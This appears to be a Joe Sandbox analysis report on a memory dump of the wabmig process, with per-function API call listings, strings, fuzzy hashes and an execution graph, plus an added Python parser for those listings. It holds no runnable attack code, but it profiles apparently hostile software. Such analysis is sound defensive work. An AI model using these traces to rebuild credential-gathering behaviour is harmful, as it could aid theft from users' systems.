                                                                            • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: FilePointer_memicmpmemcpy
                                                                            • String ID: URL
                                                                            • API String ID: 2108176848-3574463123
                                                                            APIs
                                                                            • _snwprintf.MSVCRT ref: 0040A398
                                                                            • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _snwprintfmemcpy
                                                                            • String ID: %2.2X
                                                                            • API String ID: 2789212964-323797159
                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _snwprintf
                                                                            • String ID: %%-%d.%ds
                                                                            • API String ID: 3988819677-2008345750
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040E770
                                                                            • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: MessageSendmemset
                                                                            • String ID: F^@
                                                                            • API String ID: 568519121-3652327722
                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: PlacementWindowmemset
                                                                            • String ID: WinPos
                                                                            • API String ID: 4036792311-2823255486
                                                                            APIs
                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                            • wcsrchr.MSVCRT ref: 0040DCE9
                                                                            • wcscat.MSVCRT ref: 0040DCFF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FileModuleNamewcscatwcsrchr
                                                                            • String ID: _lng.ini
                                                                            • API String ID: 383090722-1948609170
                                                                            • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                            • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                            • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                            • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                            APIs
                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                            • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                            • API String ID: 2773794195-880857682
                                                                            • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                            • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                            • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                            • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                            APIs
                                                                            • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                            • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                            • memset.MSVCRT ref: 0042BAAE
                                                                            • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memset
                                                                            • String ID:
                                                                            • API String ID: 438689982-0
                                                                            • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                            • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                            • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                            • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                            APIs
                                                                              • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@$memset
                                                                            • String ID:
                                                                            • API String ID: 1860491036-0
                                                                            • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                            • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                            • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                            • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                            APIs
                                                                            • wcslen.MSVCRT ref: 0040A8E2
                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                            • free.MSVCRT ref: 0040A908
                                                                            • free.MSVCRT ref: 0040A92B
                                                                            • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: free$memcpy$mallocwcslen
                                                                            • String ID:
                                                                            • API String ID: 726966127-0
                                                                            • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                            • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                            • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                            • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                            APIs
                                                                            • wcslen.MSVCRT ref: 0040B1DE
                                                                            • free.MSVCRT ref: 0040B201
                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                            • free.MSVCRT ref: 0040B224
                                                                            • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: free$memcpy$mallocwcslen
                                                                            • String ID:
                                                                            • API String ID: 726966127-0
                                                                            • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                            • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                            • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                            • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                            APIs
                                                                            • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                              • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                              • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                              • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                            • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                            • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                            • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcmp$memcpy
                                                                            • String ID:
                                                                            • API String ID: 231171946-0
                                                                            • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                            • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                            • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                            • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                            APIs
                                                                            • strlen.MSVCRT ref: 0040B0D8
                                                                            • free.MSVCRT ref: 0040B0FB
                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                            • free.MSVCRT ref: 0040B12C
                                                                            • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: free$memcpy$mallocstrlen
                                                                            • String ID:
                                                                            • API String ID: 3669619086-0
                                                                            • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                            • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                            • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                            • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                            • malloc.MSVCRT ref: 00417407
                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                            • free.MSVCRT ref: 00417425
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$freemalloc
                                                                            • String ID:
                                                                            • API String ID: 2605342592-0
                                                                            • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                            • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                            • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                            • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: wcslen$wcscat$wcscpy
                                                                            • String ID:
                                                                            • API String ID: 1961120804-0
                                                                            • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                            • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                            • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                            • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E
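The per-function blocks above follow one fixed layout (an "APIs" header, call lines of the form `name.MODULE(args), ref: addr`, an optional `Part of subcall function` prefix, then `Key: value` lines under Strings / Memory Dump Source / Similarity, with `$` separating the individual entries of "String ID"). Turning that text into records makes it practical to pull out the strings, the runtime-resolved imports and the fuzzy hashes across a whole report instead of reading them one block at a time. The parser below is an added example written for this page; it is not part of Joe Sandbox or its IDA plugin, and the sample input is an excerpt of two of the blocks shown above, embedded here so the code runs offline.

```python
"""Parse Joe Sandbox per-function listings (APIs / Strings / Memory Dump Source /
Similarity blocks) into records that can be aggregated across a report.
Added example for this page; not Joe Sandbox or IDA-plugin code."""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# "name.MODULE(args), ref: addr", optionally prefixed with the subcall marker.
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<name>[^.\s(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$"
)
# "Key: value" metadata lines (String ID, API ID, fuzzy hashes, Source File, ...).
FIELD_LINE = re.compile(r"^(?P<key>[A-Za-z ]+?): ?(?P<val>.*)$")
SECTION_HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiCall:
    name: str
    module: str
    ref: str                          # call-site address inside the dumped image
    args: List[str]
    subcall_of: Optional[str] = None  # set when the call sits inside a callee


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    meta: Dict[str, str] = field(default_factory=dict)

    def direct_apis(self) -> List[ApiCall]:
        return [a for a in self.apis if a.subcall_of is None]


def _clean(raw: str) -> str:
    line = raw.strip()
    return line[1:].strip() if line.startswith("•") else line


def parse_listing(text: str) -> List[FunctionRecord]:
    """One record per 'APIs' header; everything up to the next one belongs to it."""
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = _clean(raw)
        if not line or line in SECTION_HEADERS:
            continue
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a]
            cur.apis.append(ApiCall(m.group("name"), m.group("module"),
                                    m.group("ref"), args, m.group("sub")))
            continue
        m = FIELD_LINE.match(line)
        if m:
            key, val = m.group("key"), m.group("val").strip()
            if key == "String ID":        # '$' separates the individual strings
                cur.strings = [s for s in val.split("$") if s]
            else:
                cur.meta[key] = val
    return records


def resolved_imports(records: List[FunctionRecord]) -> List[str]:
    """Symbol names passed to GetProcAddress: APIs the sample resolves at runtime."""
    names: List[str] = []
    for rec in records:
        for call in rec.apis:
            if call.name == "GetProcAddress":
                names += [a for a in call.args if not re.fullmatch(r"[0-9A-Fa-f?-]+", a)]
    return names


def api_histogram(records: List[FunctionRecord]) -> Counter:
    """How often each API appears as a direct call across the listed functions."""
    return Counter(f"{c.module}!{c.name}" for r in records for c in r.direct_apis())


# Sample input: excerpt of two blocks from the listing above (wabmig, image 0x400000).
SAMPLE = """
APIs
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
• wcsrchr.MSVCRT ref: 0040DCE9
• wcscat.MSVCRT ref: 0040DCFF
Strings
Memory Dump Source
• Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileModuleNamewcscatwcsrchr
• String ID: _lng.ini
• Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
APIs
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
• GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
Strings
Similarity
• API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
• String ID: SHGetSpecialFolderPathW$shell32.dll
"""


def parse_sample() -> List[FunctionRecord]:
    return parse_listing(SAMPLE)


if __name__ == "__main__":
    recs = parse_sample()
    print("runtime-resolved:", resolved_imports(recs))
    print(api_histogram(recs).most_common())
```

Feed it the whole function listing of a report (or several reports) and the "Instruction Fuzzy Hash" values kept in `meta` can be diffed between samples, while `resolved_imports` surfaces the APIs that never appear in the import table because the sample looks them up with GetProcAddress at runtime.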

                                                                            Execution Graph

Execution Coverage: 2.4%
Dynamic/Decrypted Code Coverage: 20.5%
Signature Coverage: 0.5%
Total number of Nodes: 845
Total number of Limit Nodes: 16
execution_graph (interactive node/edge view of the wabmig image at 0x400000; the extraction flattened it into a node list. Call chains recoverable from the node labels, addresses as shown in the graph:)

• Unconnected roots: 40fc40 (70 API calls), 403640 (21 API calls), 427fa4 (42 API calls), 412e43 _endthreadex, 425115 (76 / 83 API calls, __fprintf_l), 43fe40 (134 API calls), 401445 memcpy memcpy DialogBoxParamA, 440c40 (35 API calls).
• CRT start-up stub 444c4a: GetModuleHandleA → __set_app_type __p__fmode __p__commode → __setusermatherr → 444e22 _controlfp → _initterm __getmainargs _initterm → GetStartupInfoA → GetModuleHandleA → application entry 40cf44; on return 444dcf _cexit or 444dc8 exit.
• 40cf44: 404a99 LoadLibraryA → GetProcAddress → FreeLibrary, else 404afc MessageBoxA; 410d0e LoadLibraryA → GetProcAddress; 40ccd7 ??2@YAPAXI → 404025 (6 API calls) or DeleteObject → 407088 memset _mbscpy → CreateFontIndirectA → 4019b5 strncat → 4019e5 memset LoadIconA → 40cdbf _mbscpy → 40cf9b → 407cbc (407948 free free; 407a1f malloc memcpy free free; 40796e 7 API calls; 406f30 malloc → memcpy → free; 407a55 free).
• Settings / language file handling: 409825 memset → 4097ff (406f96 GetModuleFileNameA; strrchr; _mbscat) → 409731 → 40973e _mbscpy _mbscpy → 40930c (memset GetPrivateProfileStringA; WritePrivateProfileStringA) → 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset → 4097c5 LoadStringA loop → 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa; 4096f4 memset → 40966c (406f81 GetFileAttributesA; 40967a _mbscpy _mbscpy GetPrivateProfileIntA; 409278 GetPrivateProfileStringA, three calls) → 407e30 _strcmpi → 40cfee → 40cff2 RegDeleteKeyA or 40d007 EnumResourceTypesA → 40d02f MessageBoxA or 40d047.
• 40d047 → 40ce70 → 4023b2 → 409c1c (409a32 ??3@YAXPAX chain; 409a83 ??2@YAPAXI ??2@YAPAXI; 409c80 memcpy memcpy; 408db6 12 API calls; 409d18 / 409d54 ??2@YAPAXI; 409b9c free chain) → 401e69 memset → 410dbb → 4070e3 strlen _mbscat _mbscpy _mbscat; 406f81 GetFileAttributesA; 401ee6 strlen strlen; 401c31 (7 API calls) → 410a9c RegOpenKeyExA → 401f9c memset → 410b62 RegEnumKeyExA loop (401fd9 atoi; 401fef memset memset sprintf → 410b1e; 402076 memset memset strlen strlen; 4020dd strlen strlen; 406f81 GetFileAttributesA; 402167 _mbscpy) → 40217e RegCloseKey → 402187 → 402195 ExpandEnvironmentStringsA → 406f81 GetFileAttributesA, or 4021a8 _strcmpi → 40ced3 (40cdda, 7 API calls) / 40cece.
• Window placement: 40cece → 40c3d0 memset GetModuleFileNameA strrchr → 40c425 _mbscat _mbscpy _mbscpy → 40c502 GetWindowPlacement or 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos → 409b31 → 40ba28 (406c62 LoadCursorA SetCursor; 40ba43 _mbsicmp; 40b5e5 10 API calls; 4107f1; 410a9c RegOpenKeyExA; 404734; 404785; 403c16; 407e30 _strcmpi; 40baf1 qsort; 40bafa SetCursor) → 40ceed → 40affa.
• Output writer: 40affa → 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX → 406d1a CreateFileA or 40b01f GetStdHandle → 406c62 LoadCursorA SetCursor → 40b042 → 40a57c strlen WriteFile / 40a699 (12 API calls) / 406d77 (9 API calls) → 40b116 CloseHandle → 40b11f SetCursor → 40c580 (28 API calls) → 40cf3f → 40d061 ??3@YAXPAX → 40d084 DeleteObject, or 40d09e.
• Main window: 40d0a0 CoInitialize → 40cc26 strncat memset RegisterClassA CreateWindowExA → 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA → 40c256 PostMessageA → 40d0f9 GetMessageA loop (40d113 TranslateAccelerator; 40d139 / 40d145 IsDialogMessage; 40d157 TranslateMessage DispatchMessageA; 40d16d GetMessageA) → 40d17b CoUninitialize → 40d181 ??3@YAXPAX → 40d19f DeleteObject → 407948 free free → 4080d4 free → 407948 free free → 40cf64 → _cexit / exit.
4 API calls 33536->33537 33538 409bd0 33537->33538 33539 407a1f 4 API calls 33538->33539 33540 409bda 33539->33540 33541 407a1f 4 API calls 33540->33541 33542 409be4 33541->33542 33543 407a1f 4 API calls 33542->33543 33544 409bee 33543->33544 33544->33517 33546 410d0e 2 API calls 33545->33546 33547 410dca 33546->33547 33548 410dfd memset 33547->33548 33587 4070ae 33547->33587 33550 410e1d 33548->33550 33590 410a9c RegOpenKeyExA 33550->33590 33553 401e9e strlen strlen 33553->33421 33553->33422 33554 410e4a 33555 410e7f _mbscpy 33554->33555 33591 410d3d _mbscpy 33554->33591 33555->33553 33557 410e5b 33592 410add RegQueryValueExA 33557->33592 33559 410e73 RegCloseKey 33559->33555 33560->33425 33561->33431 33593 410a9c RegOpenKeyExA 33562->33593 33564 401c4c 33565 401cad 33564->33565 33594 410add RegQueryValueExA 33564->33594 33565->33434 33565->33435 33567 401c6a 33568 401c71 strchr 33567->33568 33569 401ca4 RegCloseKey 33567->33569 33568->33569 33570 401c85 strchr 33568->33570 33569->33565 33570->33569 33571 401c94 33570->33571 33595 406f06 strlen 33571->33595 33573 401ca1 33573->33569 33574->33437 33575->33422 33576->33428 33577->33449 33598 410a9c RegOpenKeyExA 33578->33598 33580 410b34 33581 410b5d 33580->33581 33599 410add RegQueryValueExA 33580->33599 33581->33449 33583 410b4c RegCloseKey 33583->33581 33585->33449 33586->33441 33588 4070bd GetVersionExA 33587->33588 33589 4070ce 33587->33589 33588->33589 33589->33548 33589->33553 33590->33554 33591->33557 33592->33559 33593->33564 33594->33567 33596 406f17 33595->33596 33597 406f1a memcpy 33595->33597 33596->33597 33597->33573 33598->33580 33599->33583 33601 409b40 33600->33601 33603 409b4e 33600->33603 33608 409901 memset SendMessageA 33601->33608 33604 409b99 33603->33604 33605 409b8b 33603->33605 33604->33466 33609 409868 SendMessageA 33605->33609 33607->33462 33608->33603 33609->33604 33610->33469 33612 410807 33611->33612 33613 4107fc FreeLibrary 33611->33613 33612->33471 33613->33612 33614->33471 33616 
404785 FreeLibrary 33615->33616 33617 40473b LoadLibraryA 33616->33617 33618 40474c GetProcAddress 33617->33618 33621 40476e 33617->33621 33619 404764 33618->33619 33618->33621 33619->33621 33620 404781 33620->33471 33621->33620 33622 404785 FreeLibrary 33621->33622 33622->33620 33624 4047a3 33623->33624 33625 404799 FreeLibrary 33623->33625 33624->33471 33625->33624 33627 4107f1 FreeLibrary 33626->33627 33628 403c30 LoadLibraryA 33627->33628 33629 403c74 33628->33629 33630 403c44 GetProcAddress 33628->33630 33632 4107f1 FreeLibrary 33629->33632 33630->33629 33631 403c5e 33630->33631 33631->33629 33635 403c6b 33631->33635 33633 403c7b 33632->33633 33634 404734 3 API calls 33633->33634 33636 403c86 33634->33636 33635->33633 33703 4036e5 33636->33703 33639 4036e5 27 API calls 33640 403c9a 33639->33640 33641 4036e5 27 API calls 33640->33641 33642 403ca4 33641->33642 33643 4036e5 27 API calls 33642->33643 33644 403cae 33643->33644 33715 4085d2 33644->33715 33652 403ce5 33653 403cf7 33652->33653 33896 402bd1 40 API calls 33652->33896 33761 410a9c RegOpenKeyExA 33653->33761 33656 403d0a 33657 403d1c 33656->33657 33897 402bd1 40 API calls 33656->33897 33762 402c5d 33657->33762 33661 4070ae GetVersionExA 33662 403d31 33661->33662 33780 410a9c RegOpenKeyExA 33662->33780 33664 403d51 33665 403d61 33664->33665 33898 402b22 47 API calls 33664->33898 33781 410a9c RegOpenKeyExA 33665->33781 33668 403d87 33669 403d97 33668->33669 33899 402b22 47 API calls 33668->33899 33782 410a9c RegOpenKeyExA 33669->33782 33672 403dbd 33673 403dcd 33672->33673 33900 402b22 47 API calls 33672->33900 33783 410808 33673->33783 33677 404785 FreeLibrary 33678 403de8 33677->33678 33787 402fdb 33678->33787 33681 402fdb 34 API calls 33682 403e00 33681->33682 33803 4032b7 33682->33803 33691 403e3b 33693 403e73 33691->33693 33694 403e46 _mbscpy 33691->33694 33850 40fb00 33693->33850 33902 40f334 335 API calls 33694->33902 33702->33473 33704 4037c5 33703->33704 33705 4036fb 33703->33705 33704->33639 33903 
410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33705->33903 33707 40370e 33707->33704 33708 403716 strchr 33707->33708 33708->33704 33709 403730 33708->33709 33904 4021b6 memset 33709->33904 33711 40373f _mbscpy _mbscpy strlen 33712 4037a4 _mbscpy 33711->33712 33713 403789 sprintf 33711->33713 33905 4023e5 16 API calls 33712->33905 33713->33712 33716 4085e2 33715->33716 33906 4082cd 11 API calls 33716->33906 33720 408600 33721 403cba 33720->33721 33722 40860b memset 33720->33722 33733 40821d 33721->33733 33909 410b62 RegEnumKeyExA 33722->33909 33724 4086d2 RegCloseKey 33724->33721 33726 408637 33726->33724 33727 40865c memset 33726->33727 33910 410a9c RegOpenKeyExA 33726->33910 33913 410b62 RegEnumKeyExA 33726->33913 33911 410add RegQueryValueExA 33727->33911 33730 408694 33912 40848b 10 API calls 33730->33912 33732 4086ab RegCloseKey 33732->33726 33914 410a9c RegOpenKeyExA 33733->33914 33735 40823f 33736 403cc6 33735->33736 33737 408246 memset 33735->33737 33745 4086e0 33736->33745 33915 410b62 RegEnumKeyExA 33737->33915 33739 4082bf RegCloseKey 33739->33736 33741 40826f 33741->33739 33916 410a9c RegOpenKeyExA 33741->33916 33917 4080ed 11 API calls 33741->33917 33918 410b62 RegEnumKeyExA 33741->33918 33744 4082a2 RegCloseKey 33744->33741 33919 4045db 33745->33919 33747 4088ef 33927 404656 33747->33927 33751 408737 wcslen 33751->33747 33757 40876a 33751->33757 33752 40877a wcsncmp 33752->33757 33754 404734 3 API calls 33754->33757 33755 